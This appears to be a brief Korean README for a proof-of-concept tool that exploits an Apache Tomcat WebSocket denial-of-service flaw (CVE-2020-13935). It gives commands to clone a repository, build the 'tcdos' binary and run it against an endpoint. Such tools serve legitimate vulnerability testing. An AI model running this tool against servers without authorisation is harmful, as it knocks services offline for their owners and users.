
Apache Tomcat의 WebSocket 취약점 익스플로잇
해당 블로그 게시물에서 이 취약점의 분석 및 익스플로잇 방법이 자세히 설명되어 있습니다.
저장소를 클론한 다음 tcdos 바이너리를 빌드하세요. 특정 WebSocket 엔드포인트가 취약한지 테스트하려면 다음과 같이 프로그램을 실행하세요:
$ git clone https://github.com/RedTeamPentesting/CVE-2020-13935
$ cd CVE-2020-13935
$ go build
$ ./tcdos [WebSocket endpoint]